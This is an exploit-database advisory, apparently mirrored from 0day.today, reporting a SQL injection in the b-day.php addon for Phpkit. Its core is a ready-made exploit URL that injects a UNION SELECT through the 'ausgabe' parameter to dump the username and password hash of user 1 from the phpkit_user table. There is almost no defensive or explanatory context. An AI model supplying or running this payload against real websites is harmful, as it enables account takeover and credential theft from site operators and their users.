Phpkit addon (b-day.php) SQL Injection Vulnerability

2010-03-22T00:00:00
ID 1337DAY-ID-9682
Type zdt
Reporter n3w7u
Modified 2010-03-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================
Phpkit addon (b-day.php) SQL Injection Vulnerability
====================================================

[+] Autor: n3w7u

[+] Vulnerabilities [ SQL Injection ]

[+] Language: [ PHP ]

[+] Date: 22.03.2010


.-=--=--=--=--=--=--=--=--=--=--=-.

[+] Vulnerability

include.php?path=b-day.php&ausgabe=


[+] Exploitable


http://[host]/[path]/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt
+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1-
-



#  0day.today [2018-04-02]  #